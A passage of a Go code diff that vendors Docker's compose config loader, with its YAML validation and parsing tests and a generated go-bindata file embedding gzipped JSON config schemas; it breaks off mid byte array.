TestInvalidVersion(t *testing.T) { + _, err := loadYAML(` +version: 3 +services: + foo: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "version must be a string") +} + +func TestV1Unsupported(t *testing.T) 
{ + _, err := loadYAML(` +foo: + image: busybox +`) + assert.Error(t, err) +} + +func TestNonMappingObject(t *testing.T) { + _, err := loadYAML(` +version: "3" +services: + - foo: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "services must be a mapping") + + _, err = loadYAML(` +version: "3" +services: + foo: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "services.foo must be a mapping") + + _, err = loadYAML(` +version: "3" +networks: + - default: + driver: bridge +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "networks must be a mapping") + + _, err = loadYAML(` +version: "3" +networks: + default: bridge +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "networks.default must be a mapping") + + _, err = loadYAML(` +version: "3" +volumes: + - data: + driver: local +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "volumes must be a mapping") + + _, err = loadYAML(` +version: "3" +volumes: + data: local +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "volumes.data must be a mapping") +} + +func TestNonStringImage(t *testing.T) { + _, err := loadYAML(` +version: "3" +services: + foo: + image: ["busybox", "latest"] +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "services.foo.image must be a string") +} + +func TestValidEnvironment(t *testing.T) { + config, err := loadYAML(` +version: "3" +services: + dict-env: + image: busybox + environment: + FOO: "1" + BAR: 2 + BAZ: 2.5 + QUUX: + list-env: + image: busybox + environment: + - FOO=1 + - BAR=2 + - BAZ=2.5 + - QUUX= +`) + assert.NoError(t, err) + + expected := map[string]string{ + "FOO": "1", + "BAR": "2", + "BAZ": "2.5", + "QUUX": "", + } + + assert.Equal(t, 2, len(config.Services)) + + for _, service := range config.Services { + assert.Equal(t, expected, service.Environment) + } +} + +func TestInvalidEnvironmentValue(t *testing.T) { + _, err := loadYAML(` +version: "3" +services: + dict-env: + image: 
busybox + environment: + FOO: ["1"] +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "services.dict-env.environment.FOO must be a string, number or null") +} + +func TestInvalidEnvironmentObject(t *testing.T) { + _, err := loadYAML(` +version: "3" +services: + dict-env: + image: busybox + environment: "FOO=1" +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "services.dict-env.environment must be a mapping") +} + +func TestEnvironmentInterpolation(t *testing.T) { + config, err := loadYAML(` +version: "3" +services: + test: + image: busybox + labels: + - home1=$HOME + - home2=${HOME} + - nonexistent=$NONEXISTENT + - default=${NONEXISTENT-default} +networks: + test: + driver: $HOME +volumes: + test: + driver: $HOME +`) + + assert.NoError(t, err) + + home := os.Getenv("HOME") + + expectedLabels := map[string]string{ + "home1": home, + "home2": home, + "nonexistent": "", + "default": "default", + } + + assert.Equal(t, expectedLabels, config.Services[0].Labels) + assert.Equal(t, home, config.Networks["test"].Driver) + assert.Equal(t, home, config.Volumes["test"].Driver) +} + +func TestUnsupportedProperties(t *testing.T) { + dict, err := ParseYAML([]byte(` +version: "3" +services: + web: + image: web + build: ./web + links: + - bar + db: + image: db + build: ./db +`)) + assert.NoError(t, err) + + configDetails := buildConfigDetails(dict) + + _, err = Load(configDetails) + assert.NoError(t, err) + + unsupported := GetUnsupportedProperties(configDetails) + assert.Equal(t, []string{"build", "links"}, unsupported) +} + +func TestDeprecatedProperties(t *testing.T) { + dict, err := ParseYAML([]byte(` +version: "3" +services: + web: + image: web + container_name: web + db: + image: db + container_name: db + expose: ["5434"] +`)) + assert.NoError(t, err) + + configDetails := buildConfigDetails(dict) + + _, err = Load(configDetails) + assert.NoError(t, err) + + deprecated := GetDeprecatedProperties(configDetails) + assert.Equal(t, 2, len(deprecated)) + 
// durationPtr returns a pointer to value; used to populate optional
// *time.Duration fields in expected test fixtures.
func durationPtr(value time.Duration) *time.Duration {
	d := value
	return &d
}

// int64Ptr returns a pointer to value, for optional int64 fields.
func int64Ptr(value int64) *int64 {
	v := value
	return &v
}

// uint64Ptr returns a pointer to value, for optional uint64 fields.
func uint64Ptr(value uint64) *uint64 {
	v := value
	return &v
}
RestartPolicy: &types.RestartPolicy{ + Condition: "on_failure", + Delay: durationPtr(5 * time.Second), + MaxAttempts: uint64Ptr(3), + Window: durationPtr(2 * time.Minute), + }, + Placement: types.Placement{ + Constraints: []string{"node=foo"}, + }, + }, + Devices: []string{"/dev/ttyUSB0:/dev/ttyUSB0"}, + DNS: []string{"8.8.8.8", "9.9.9.9"}, + DNSSearch: []string{"dc1.example.com", "dc2.example.com"}, + DomainName: "foo.com", + Entrypoint: []string{"/code/entrypoint.sh", "-p", "3000"}, + Environment: map[string]string{ + "RACK_ENV": "development", + "SHOW": "true", + "SESSION_SECRET": "", + "FOO": "1", + "BAR": "2", + "BAZ": "3", + }, + Expose: []string{"3000", "8000"}, + ExternalLinks: []string{ + "redis_1", + "project_db_1:mysql", + "project_db_1:postgresql", + }, + ExtraHosts: map[string]string{ + "otherhost": "50.31.209.229", + "somehost": "162.242.195.82", + }, + HealthCheck: &types.HealthCheckConfig{ + Test: []string{ + "CMD-SHELL", + "echo \"hello world\"", + }, + Interval: "10s", + Timeout: "1s", + Retries: uint64Ptr(5), + }, + Hostname: "foo", + Image: "redis", + Ipc: "host", + Labels: map[string]string{ + "com.example.description": "Accounting webapp", + "com.example.number": "42", + "com.example.empty-label": "", + }, + Links: []string{ + "db", + "db:database", + "redis", + }, + Logging: &types.LoggingConfig{ + Driver: "syslog", + Options: map[string]string{ + "syslog-address": "tcp://192.168.0.42:123", + }, + }, + MacAddress: "02:42:ac:11:65:43", + NetworkMode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b", + Networks: map[string]*types.ServiceNetworkConfig{ + "some-network": { + Aliases: []string{"alias1", "alias3"}, + Ipv4Address: "", + Ipv6Address: "", + }, + "other-network": { + Ipv4Address: "172.16.238.10", + Ipv6Address: "2001:3984:3989::10", + }, + "other-other-network": nil, + }, + Pid: "host", + Ports: []string{ + "3000", + "3000-3005", + "8000:8000", + "9090-9091:8080-8081", + "49100:22", + "127.0.0.1:8001:8001", 
+ "127.0.0.1:5000-5010:5000-5010", + }, + Privileged: true, + ReadOnly: true, + Restart: "always", + SecurityOpt: []string{ + "label=level:s0:c100,c200", + "label=type:svirt_apache_t", + }, + StdinOpen: true, + StopSignal: "SIGUSR1", + StopGracePeriod: &stopGracePeriod, + Tmpfs: []string{"/run", "/tmp"}, + Tty: true, + Ulimits: map[string]*types.UlimitsConfig{ + "nproc": { + Single: 65535, + }, + "nofile": { + Soft: 20000, + Hard: 40000, + }, + }, + User: "someone", + Volumes: []string{ + "/var/lib/mysql", + "/opt/data:/var/lib/mysql", + fmt.Sprintf("%s:/code", workingDir), + fmt.Sprintf("%s/static:/var/www/html", workingDir), + fmt.Sprintf("%s/configs:/etc/configs/:ro", homeDir), + "datavolume:/var/lib/mysql", + }, + WorkingDir: "/code", + } + + assert.Equal(t, []types.ServiceConfig{expectedServiceConfig}, config.Services) + + expectedNetworkConfig := map[string]types.NetworkConfig{ + "some-network": {}, + + "other-network": { + Driver: "overlay", + DriverOpts: map[string]string{ + "foo": "bar", + "baz": "1", + }, + Ipam: types.IPAMConfig{ + Driver: "overlay", + Config: []*types.IPAMPool{ + {Subnet: "172.16.238.0/24"}, + {Subnet: "2001:3984:3989::/64"}, + }, + }, + }, + + "external-network": { + External: types.External{ + Name: "external-network", + External: true, + }, + }, + + "other-external-network": { + External: types.External{ + Name: "my-cool-network", + External: true, + }, + }, + } + + assert.Equal(t, expectedNetworkConfig, config.Networks) + + expectedVolumeConfig := map[string]types.VolumeConfig{ + "some-volume": {}, + "other-volume": { + Driver: "flocker", + DriverOpts: map[string]string{ + "foo": "bar", + "baz": "1", + }, + }, + "external-volume": { + External: types.External{ + Name: "external-volume", + External: true, + }, + }, + "other-external-volume": { + External: types.External{ + Name: "my-cool-volume", + External: true, + }, + }, + } + + assert.Equal(t, expectedVolumeConfig, config.Volumes) +} + +func loadYAML(yaml string) (*types.Config, 
error) { + dict, err := ParseYAML([]byte(yaml)) + if err != nil { + return nil, err + } + + return Load(buildConfigDetails(dict)) +} + +func serviceSort(services []types.ServiceConfig) []types.ServiceConfig { + sort.Sort(servicesByName(services)) + return services +} + +type servicesByName []types.ServiceConfig + +func (sbn servicesByName) Len() int { return len(sbn) } +func (sbn servicesByName) Swap(i, j int) { sbn[i], sbn[j] = sbn[j], sbn[i] } +func (sbn servicesByName) Less(i, j int) bool { return sbn[i].Name < sbn[j].Name } diff --git a/vendor/github.com/docker/docker/cli/compose/schema/bindata.go b/vendor/github.com/docker/docker/cli/compose/schema/bindata.go new file mode 100644 index 0000000000..9486e91ae0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/schema/bindata.go @@ -0,0 +1,260 @@ +// Code generated by go-bindata. +// sources: +// data/config_schema_v3.0.json +// data/config_schema_v3.1.json +// DO NOT EDIT! + +package schema + +import ( + "bytes" + "compress/gzip" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "strings" + "time" +) + +func bindataRead(data []byte, name string) ([]byte, error) { + gz, err := gzip.NewReader(bytes.NewBuffer(data)) + if err != nil { + return nil, fmt.Errorf("Read %q: %v", name, err) + } + + var buf bytes.Buffer + _, err = io.Copy(&buf, gz) + clErr := gz.Close() + + if err != nil { + return nil, fmt.Errorf("Read %q: %v", name, err) + } + if clErr != nil { + return nil, err + } + + return buf.Bytes(), nil +} + +type asset struct { + bytes []byte + info os.FileInfo +} + +type bindataFileInfo struct { + name string + size int64 + mode os.FileMode + modTime time.Time +} + +func (fi bindataFileInfo) Name() string { + return fi.name +} +func (fi bindataFileInfo) Size() int64 { + return fi.size +} +func (fi bindataFileInfo) Mode() os.FileMode { + return fi.mode +} +func (fi bindataFileInfo) ModTime() time.Time { + return fi.modTime +} +func (fi bindataFileInfo) IsDir() bool { + return false +} +func (fi 
bindataFileInfo) Sys() interface{} { + return nil +} + +var _dataConfig_schema_v30Json = []byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x5a\x4f\x8f\xdb\xb8\x0e\xbf\xe7\x53\x18\x6e\x6f\xcd\xcc\x14\x78\xc5\x03\x5e\x6f\xef\xb8\xa7\xdd\xf3\x0e\x5c\x43\xb1\x99\x44\x1d\x59\x52\x29\x39\x9d\xb4\xc8\x77\x5f\xc8\xff\x22\x2b\x92\xe5\x24\xee\xb6\x87\x9e\x66\x62\x91\x14\xff\xe9\x47\x8a\xf6\xf7\x55\x92\xa4\x6f\x55\xb1\x87\x8a\xa4\x1f\x93\x74\xaf\xb5\xfc\xf8\xf4\xf4\x59\x09\xfe\xd0\x3e\x7d\x14\xb8\x7b\x2a\x91\x6c\xf5\xc3\xfb\x0f\x4f\xed\xb3\x37\xe9\xda\xf0\xd1\xd2\xb0\x14\x82\x6f\xe9\x2e\x6f\x57\xf2\xc3\x7f\x1e\xdf\x3f\x1a\xf6\x96\x44\x1f\x25\x18\x22\xb1\xf9\x0c\x85\x6e\x9f\x21\x7c\xa9\x29\x82\x61\x7e\x4e\x0f\x80\x8a\x0a\x9e\x66\xeb\x95\x59\x93\x28\x24\xa0\xa6\xa0\xd2\x8f\x89\x51\x2e\x49\x06\x92\xfe\x81\x25\x56\x69\xa4\x7c\x97\x36\x8f\x4f\x8d\x84\x24\x49\x15\xe0\x81\x16\x96\x84\x41\xd5\x37\x4f\x67\xf9\x4f\x03\xd9\xda\x95\x6a\x29\xdb\x3c\x97\x44\x6b\x40\xfe\xd7\xa5\x6e\xcd\xf2\xa7\x67\xf2\xf0\xed\xff\x0f\x7f\xbf\x7f\xf8\xdf\x63\xfe\x90\xbd\x7b\x3b\x5a\x36\xfe\x45\xd8\xb6\xdb\x97\xb0\xa5\x9c\x6a\x2a\xf8\xb0\x7f\x3a\x50\x9e\xba\xff\x4e\xc3\xc6\xa4\x2c\x1b\x62\xc2\x46\x7b\x6f\x09\x53\x30\xb6\x99\x83\xfe\x2a\xf0\x25\x66\xf3\x40\xf6\x93\x6c\xee\xf6\xf7\xd8\x3c\x36\xe7\x20\x58\x5d\x45\x23\xd8\x53\xfd\x24\x63\xda\xed\xef\x8b\xdf\xaa\x37\x7a\x92\xb6\xa5\xb0\xf6\x6e\x14\x1c\x65\xbb\xcf\x55\xbe\x6c\x0b\xfb\x6a\x70\x56\xc0\x4b\x25\x48\x26\x8e\xe6\x59\xc0\x1f\x2d\x41\x05\x5c\xa7\x83\x0b\x92\x24\xdd\xd4\x94\x95\xae\x47\x05\x87\x3f\x8d\x88\x67\xeb\x61\x92\x7c\x77\x0f\xb6\x25\xa7\x59\x1f\xfd\x0a\x07\x7c\x58\x0f\xd8\x32\xac\x17\x82\x6b\x78\xd5\x8d\x51\xd3\x5b\xb7\x2e\x10\xc5\x0b\xe0\x96\x32\x98\xcb\x41\x70\xa7\x26\x5c\xc6\xa8\xd2\xb9\xc0\xbc\xa4\x85\x4e\x4f\x0e\xfb\x85\xbc\x78\x3e\x0d\xac\xd6\xaf\x6c\xe5\x11\x98\x16\x44\xe6\xa4\x2c\x47\x76\x10\x44\x72\x4c\xd7\x49\x4a\x35\x54\xca\x6f\x62\x92\xd6\x9c\x7e\xa9\xe1\x8f\x8e\x44\x63\x0d\xae\xdc\x12\x85\x5c\x5e\xf0\x0e\x45\x2d\x73\x49\xd0\x24\xd8\xb
4\xfb\xd3\x42\x54\x15\xe1\x4b\x65\xdd\x35\x76\xcc\xf0\xbc\xe0\x9a\x50\x0e\x98\x73\x52\xc5\x12\xc9\x9c\x3a\xe0\xa5\xca\xdb\xfa\x37\x99\x46\xdb\xbc\xe5\x57\x8e\x80\xa1\x18\x2e\x1a\x8f\x92\x4f\x25\x76\x2b\xc6\xa4\xb6\xd1\x2d\x75\x18\x73\x05\x04\x8b\xfd\x8d\xfc\xa2\x22\x94\xcf\xf1\x1d\x70\x8d\x47\x29\x68\x9b\x2f\xbf\x5c\x22\x00\x3f\xe4\x03\x96\x5c\xed\x06\xe0\x07\x8a\x82\x57\xfd\x69\x98\x03\x30\x03\xc8\x1b\xfe\x57\x29\x14\xb8\x8e\x71\x0c\xb4\x97\x06\x53\x47\x3e\xe9\x39\x9e\x7b\xc3\xd7\x49\xca\xeb\x6a\x03\x68\x5a\xba\x11\xe5\x56\x60\x45\x8c\xb2\xfd\xde\xd6\xf2\xc8\xd3\x9e\xcc\xb3\x1d\x68\xdb\x60\xca\x3a\x61\x39\xa3\xfc\x65\xf9\x14\x87\x57\x8d\x24\xdf\x0b\xa5\xe7\x63\xb8\xc5\xbe\x07\xc2\xf4\xbe\xd8\x43\xf1\x32\xc1\x6e\x53\x8d\xb8\x85\xd2\x73\x92\x9c\x56\x64\x17\x27\x92\x45\x8c\x84\x91\x0d\xb0\x9b\xec\x5c\xd4\xf9\x96\x58\xb1\xdb\x19\xd2\x50\xc6\x5d\x74\x2e\xdd\x72\xac\xe6\x97\x48\x0f\x80\x73\x0b\xb8\x90\xe7\x86\xcb\x5d\x8c\x37\x20\x49\xbc\xfb\x1c\x91\x7e\x7a\x6c\x9b\xcf\x89\x53\xd5\xfc\xc7\x58\x9a\xb9\xed\x42\xe2\xd4\x7d\xdf\x13\xc7\xc2\x79\x0d\xc5\x28\x2a\x15\x29\x4c\xdf\x80\xa0\x02\x71\x3d\x93\x76\xcd\x7e\x5e\x89\x32\x94\xa0\x17\xc4\xae\x6f\x82\x48\x7d\x75\x21\x4c\x6e\xea\x1f\x67\x85\x2e\x7a\x81\x88\x58\x13\x52\x6f\xae\x9a\x67\x75\xe3\x29\xd6\xd0\x11\x46\x89\x82\xf8\x61\x0f\x3a\x72\x24\x8d\xca\xc3\x87\x99\x39\xe1\xe3\xfd\xef\x24\x6f\x80\x35\x28\x73\x7e\x8f\x1c\x11\x75\x56\xa5\x39\x6e\x3e\x45\xb2\xc8\x69\xfb\xc1\x2d\xbc\xa4\x65\x18\x2b\x1a\x84\xb0\x0f\x98\x14\xa8\x2f\x4e\xd7\xbf\x53\xee\xdb\xad\xef\xae\xf6\x12\xe9\x81\x32\xd8\xc1\xf8\xd6\xb2\x11\x82\x01\xe1\x23\xe8\x41\x20\x65\x2e\x38\x3b\xce\xa0\x54\x9a\x60\xf4\x42\xa1\xa0\xa8\x91\xea\x63\x2e\xa4\x5e\xbc\xcf\x50\xfb\x2a\x57\xf4\x1b\x8c\xa3\x79\xc6\xfb\x4e\x50\x36\xe2\x39\xaa\x42\xdf\x56\xaf\x95\x2e\x29\xcf\x85\x04\x1e\xf5\x8e\xd2\x42\xe6\x3b\x24\x05\xe4\x12\x90\x8a\xd2\x67\xe0\xda\x8e\x75\x59\x23\x31\xfb\x5f\x8a\x51\x74\xc7\x09\x8b\x39\x5a\x57\x72\x7b\xe3\xc5\x42\xeb\x78\xb8\x6b\x46\x2b\x1a\x3e\x07\x1e\x80\x9d\x51\x03\x5
a\xfc\xf7\xc3\xfe\x04\xe4\x9f\x35\xa5\x5c\xc3\x0e\xd0\x87\x94\x13\x5d\xc7\x74\xd3\x31\xa3\xdb\xd8\x13\x1c\x07\x74\x42\x8f\x86\x41\x89\xad\xf6\x33\xf8\x7a\x11\xaf\x5e\xa3\xe1\x6f\x23\x6f\xdd\x29\x92\x79\xe9\xaf\x82\x73\x57\x8d\x2c\x88\xa8\x27\x2f\xa2\xd6\x2a\xda\x18\x36\x34\x5c\x4d\x35\x35\x03\xa9\x35\xc5\x5c\x14\x2f\x4c\xa3\x64\x0e\x41\x49\xfd\xda\xae\x1c\xcb\xae\x98\x23\x3b\x77\x96\x5e\x80\x6f\xa2\x68\x93\x46\x27\xb0\xd3\xd3\xcd\x8e\x28\x38\x79\xa4\x8a\x6c\x9c\x99\x9b\xef\x70\x9b\x6c\xc4\x43\x1c\x63\x10\x34\x52\x27\x2e\x1d\xda\x8e\xf0\x04\xd4\xaf\x39\x38\xd0\xb4\x02\x51\xfb\x6b\xd6\xca\xce\xef\x8e\x29\xb5\x26\xb3\x91\xa0\x5a\x94\x6e\x4c\x9f\x87\xa0\xf6\xfd\x45\x34\x70\x73\x0e\x09\x82\x64\xb4\x20\x2a\x06\x44\x77\x5c\x50\x6b\x59\x12\x0d\x79\xfb\xa2\xea\x2a\xe8\x9f\xc0\x7c\x49\x90\x30\x06\x8c\xaa\x6a\x0e\x86\xa6\x25\x30\x72\xbc\xa9\x7c\x36\xec\x5b\x42\x59\x8d\x90\x93\x42\x77\xef\xc2\x22\x39\x97\x56\x82\x53\x2d\xbc\x08\x31\x6f\xcb\x8a\xbc\xe6\xfd\xb6\x0d\x89\xf7\xc0\x04\xdb\xba\xb9\x77\x4b\x2b\x13\x94\xa8\xb1\xb8\x70\xf6\xcd\x21\x3a\xd7\xfa\x40\xc6\xf4\x3b\x5e\x98\x8e\xa0\x0c\x92\x0c\x57\xff\x28\x7f\xb4\xb4\x74\x7d\x66\x2e\x05\xa3\xc5\x71\x29\x0b\x0b\xc1\x5b\x27\xcf\x49\x88\x3b\x33\xd0\xa4\x83\x69\x85\x2a\xa9\xa3\x87\xb5\x61\xf8\x4a\x79\x29\xbe\x5e\xb1\xe1\x72\xa9\x24\x19\x29\xc0\xc1\xbb\x7b\x1d\xad\x34\x12\xca\xf5\xd5\xe5\xfc\x5e\xb3\xee\xa8\xe6\x43\x7e\x46\x50\x7f\xa0\x8b\xbf\x49\x0d\x20\x7d\x21\xeb\xe8\x3c\xa8\x82\x4a\xa0\x37\x01\x17\x78\xf3\x1d\x33\xb1\x27\x5b\xa0\xaa\xcd\x1a\x20\x76\x54\xe6\xbe\xb8\xf8\x6d\x23\x3e\x24\xcc\xe2\x80\x44\x25\xa9\x96\x3a\x1d\xb3\x47\xaa\xa9\xb7\x06\x27\xd3\xa3\x88\x24\x3c\x8e\x88\x69\x1d\xd7\xbd\xa3\x50\xf5\x86\xc3\x64\x47\x65\xf9\xd3\xf7\x9e\x77\xfe\x35\xe5\x14\xbe\x94\xdc\x07\x7a\xfd\xdb\x90\x40\x54\x9f\x87\x9e\x79\x3d\xf8\x2a\x9b\x1d\xe2\xe0\xab\x88\xe5\xf4\xbf\xb2\xc1\xbb\x03\x33\xba\x2f\x37\x22\x90\xd1\x51\xfd\x46\x8c\xdf\xf9\x75\x65\x7e\x39\x43\x2a\x2b\xcf\x2e\xef\x8f\x53\x29\x31\x7b\x3a\xdf\x71\x64\x63\x35\x5c\x32\xcf\x07\x74\x6
3\xb4\x9d\x1a\x4a\xf4\x24\x81\x69\xad\xb3\x69\xe7\xc4\x69\xcb\x17\xcc\xf0\xc7\x77\x13\x35\x65\xea\x2d\xda\x0f\x02\xe3\x05\x06\x3e\xfe\x98\x3a\x8d\x68\xef\xdd\xcb\xaf\xc0\x02\xa0\x66\xf1\x5f\x7c\x13\x66\xec\xe4\xc7\x8b\xf9\xc6\xf7\xf1\xd0\xae\xfd\x9e\x2b\x1b\xf9\xc7\x21\x69\xdf\x49\x5b\x90\x92\xd9\xbd\x79\x28\x8c\xde\x2f\xc5\xdc\x91\x61\xff\xc5\x56\xe6\x87\xab\x95\xfd\xb7\xf9\xba\x6e\x75\x5a\xfd\x13\x00\x00\xff\xff\x46\xf7\x7b\x23\xe5\x2a\x00\x00") + +func dataConfig_schema_v30JsonBytes() ([]byte, error) { + return bindataRead( + _dataConfig_schema_v30Json, + "data/config_schema_v3.0.json", + ) +} + +func dataConfig_schema_v30Json() (*asset, error) { + bytes, err := dataConfig_schema_v30JsonBytes() + if err != nil { + return nil, err + } + + info := bindataFileInfo{name: "data/config_schema_v3.0.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)} + a := &asset{bytes: bytes, info: info} + return a, nil +} + +var _dataConfig_schema_v31Json = []byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x1a\xcb\x8e\xdb\x36\xf0\xee\xaf\x10\x94\xdc\xe2\xdd\x4d\xd1\xa0\x40\x73\xeb\xb1\xa7\xf6\xdc\x85\x23\xd0\xd2\x58\x66\x96\x22\x19\x92\x72\xd6\x09\xfc\xef\x05\xf5\x32\x45\x91\x22\x6d\x2b\xd9\x45\xd1\xd3\xae\xc5\x99\xe1\xbc\x67\x38\xe4\xf7\x55\x92\xa4\x6f\x65\xbe\x87\x0a\xa5\x1f\x93\x74\xaf\x14\xff\xf8\xf0\xf0\x59\x32\x7a\xd7\x7e\xbd\x67\xa2\x7c\x28\x04\xda\xa9\xbb\xf7\x1f\x1e\xda\x6f\x6f\xd2\xb5\xc6\xc3\x85\x46\xc9\x19\xdd\xe1\x32\x6b\x57\xb2\xc3\xaf\xf7\xbf\xdc\x6b\xf4\x16\x44\x1d\x39\x68\x20\xb6\xfd\x0c\xb9\x6a\xbf\x09\xf8\x52\x63\x01\x1a\xf9\x31\x3d\x80\x90\x98\xd1\x74\xb3\x5e\xe9\x35\x2e\x18\x07\xa1\x30\xc8\xf4\x63\xa2\x99\x4b\x92\x01\xa4\xff\x60\x90\x95\x4a\x60\x5a\xa6\xcd\xe7\x53\x43\x21\x49\x52\x09\xe2\x80\x73\x83\xc2\xc0\xea\x9b\x87\x33\xfd\x87\x01\x6c\x6d\x53\x35\x98\x6d\xbe\x73\xa4\x14\x08\xfa\xf7\x94\xb7\x66\xf9\xd3\x23\xba\xfb\xf6\xc7\xdd\x3f\xef\xef\x7e\xbf\xcf\xee\x36\xef\xde\x8e\x96\xb5\x7e\x05\xec\xda\xed\x0b\xd8\x61\x8a\x15\x66\x74\xd8\x3f\x1d\x20\x4f\xd
d\x7f\xa7\x61\x63\x54\x14\x0d\x30\x22\xa3\xbd\x77\x88\x48\x18\xcb\x4c\x41\x7d\x65\xe2\x29\x24\xf3\x00\xf6\x42\x32\x77\xfb\x3b\x64\x1e\x8b\x73\x60\xa4\xae\x82\x16\xec\xa1\x5e\x48\x98\x76\xfb\x65\xec\x27\x21\x17\xa0\xc2\x2e\xdb\x42\xbd\x98\xc7\xea\xed\x6f\x13\x78\xd5\x0b\x3d\x0b\xdb\x42\x18\x7b\x37\x0c\x8e\xc2\xdb\xa5\x2a\x57\x78\xf9\x75\x35\x28\xcb\xa3\xa5\x02\x38\x61\x47\xfd\xcd\xa3\x8f\x16\xa0\x02\xaa\xd2\x41\x05\x49\x92\x6e\x6b\x4c\x0a\x5b\xa3\x8c\xc2\x5f\x9a\xc4\xa3\xf1\x31\x49\xbe\xdb\x99\xcc\xa0\xd3\xac\x8f\x7e\xf9\x0d\x3e\xac\x7b\x64\x19\xd6\x73\x46\x15\x3c\xab\x46\xa8\xf9\xad\x5b\x15\xb0\xfc\x09\xc4\x0e\x13\x88\xc5\x40\xa2\x94\x33\x2a\x23\x58\xaa\x8c\x89\xac\xc0\xb9\x4a\x4f\x16\xfa\x84\x5e\xd8\x9f\x06\x54\xe3\xd7\x66\xe5\x20\x98\xe6\x88\x67\xa8\x28\x46\x72\x20\x21\xd0\x31\x5d\x27\x29\x56\x50\x49\xb7\x88\x49\x5a\x53\xfc\xa5\x86\x3f\x3b\x10\x25\x6a\xb0\xe9\x16\x82\xf1\xe5\x09\x97\x82\xd5\x3c\xe3\x48\x68\x07\x9b\x57\x7f\x9a\xb3\xaa\x42\x74\x29\xaf\xbb\x44\x8e\x08\xcd\x33\xaa\x10\xa6\x20\x32\x8a\xaa\x90\x23\xe9\xa8\x03\x5a\xc8\xac\x2d\xf8\xb3\x6e\xb4\xcb\x5a\x7c\x69\x11\x18\xaa\xff\xa2\xf6\x28\xe8\x9c\x63\xb7\x64\xb4\x6b\x6b\xde\x52\x0b\x31\x93\x80\x44\xbe\xbf\x12\x9f\x55\x08\xd3\x18\xdd\x01\x55\xe2\xc8\x19\x6e\xfd\xe5\xd5\x39\x02\xd0\x43\x36\xe4\x92\x8b\xd5\x00\xf4\x80\x05\xa3\x55\x1f\x0d\x31\x09\x66\x48\xf2\x1a\xff\x99\x33\x09\xb6\x62\x2c\x01\xcd\xa5\x41\xd4\x91\x4e\x7a\x8c\xc7\x5e\xf0\x75\x92\xd2\xba\xda\x82\xd0\x3d\xec\x08\x72\xc7\x44\x85\x34\xb3\xfd\xde\xc6\xf2\x48\xd3\x0e\xcf\x33\x15\x68\xca\xa0\xcb\x3a\x22\x19\xc1\xf4\x69\x79\x17\x87\x67\x25\x50\xb6\x67\x52\xc5\xe7\x70\x03\x7d\x0f\x88\xa8\x7d\xbe\x87\xfc\x69\x06\xdd\x84\x1a\x61\x33\xa9\x62\x9c\x1c\x57\xa8\x0c\x03\xf1\x3c\x04\x42\xd0\x16\xc8\x55\x72\x2e\xaa\x7c\x83\x2c\x2b\x4b\x0d\xea\xf3\xb8\x49\xe7\xd2\x2d\x87\x6a\x7e\x21\xf0\x01\x44\x6c\x01\x67\xfc\xdc\x70\xd9\x8b\xe1\x06\x24\x09\x77\x9f\x23\xd0\x4f\xf7\x6d\xf3\x39\x13\x55\xcd\x7f\x84\xa4\x1b\xbb\x5d\x48\xac\xba\xef\xfa\x62\x49\x18\xd7\x50\x8c\xac\x52\xa
1\x5c\xf7\x0d\x02\xa4\xc7\xae\x67\xd0\xee\x74\x93\x55\xac\xf0\x39\xe8\x04\xd8\xd6\x8d\x37\x53\x5f\x5c\x08\x93\xab\xfa\xc7\x28\xd3\x05\x0f\x10\x01\x69\x7c\xec\xc5\xb2\x79\x66\x37\xec\x62\x0d\x1c\x22\x18\x49\x08\x07\xbb\x57\x91\x23\x6a\x98\x1f\x3e\x44\xfa\x84\x0b\xf7\xb7\x59\x5c\x0f\xaa\x97\x66\x7c\x8f\x1c\x20\x75\x66\xa5\x09\x37\x17\x23\x9b\x40\xb4\xfd\xe0\x16\x9e\xe3\xc2\x9f\x2b\x9a\x0c\x61\x06\x18\x67\x42\x4d\xa2\xeb\xe7\x94\xfb\x76\xeb\x9b\xab\x3d\x17\xf8\x80\x09\x94\x30\x3e\xb5\x6c\x19\x23\x80\xe8\x28\xf5\x08\x40\x45\xc6\x28\x39\x46\x40\x4a\x85\x44\xf0\x40\x21\x21\xaf\x05\x56\xc7\x8c\x71\xb5\x78\x9f\x21\xf7\x55\x26\xf1\x37\x18\x5b\xf3\x9c\xef\x3b\x42\x1b\x8b\x21\x6b\x42\x72\xa5\x41\x7d\x29\x29\x1c\xc6\x8e\x44\x18\x4c\x54\xe1\x14\x95\x4a\x56\x8b\x3c\xf6\x80\xad\xf7\x44\xa2\x84\xd8\x23\xbc\x76\xb7\x71\xd8\xcc\x03\x97\x97\x00\x4f\x0a\x5d\x67\xc2\x50\x55\xb6\x7f\x9b\x79\xe5\xe4\x0c\x7d\x79\x94\xb9\xba\xae\x5b\x93\xaa\xc0\x34\x63\x1c\x68\x30\x36\xa4\x62\x3c\x2b\x05\xca\x21\xe3\x20\x30\x73\xaa\x62\x6d\x46\x7a\x51\x0b\xa4\xf7\x9f\x92\x91\xb8\xa4\x88\x84\xc2\x4c\x55\x7c\x77\xe5\xb1\x52\xa9\x70\xb0\xd7\x04\x57\xd8\x1f\x34\x0e\xaf\x8d\xe8\x00\xda\xea\xef\x2e\xfa\x33\x05\xff\xcc\x29\xa6\x0a\x4a\xed\x26\x53\xa7\x9a\xe9\x39\xe7\x5b\xce\x88\x5e\x73\x8f\xc4\xd8\xa0\x33\x7c\x24\x6d\x60\xee\x94\x1b\xc1\xd5\x89\x3a\xf9\x1a\xdd\x75\x34\xf4\xd6\x1d\x23\x1b\x27\xfc\x45\xc5\xdc\x66\x63\xe3\xad\xa7\xee\xa0\xaa\x65\xf0\x58\xd0\xc0\x50\x39\xd7\xd2\x0e\xa0\xc6\xd0\x7e\xd1\x6a\xa1\xdb\x64\x1d\x04\x05\x76\x73\xbb\xb2\x24\xbb\x60\x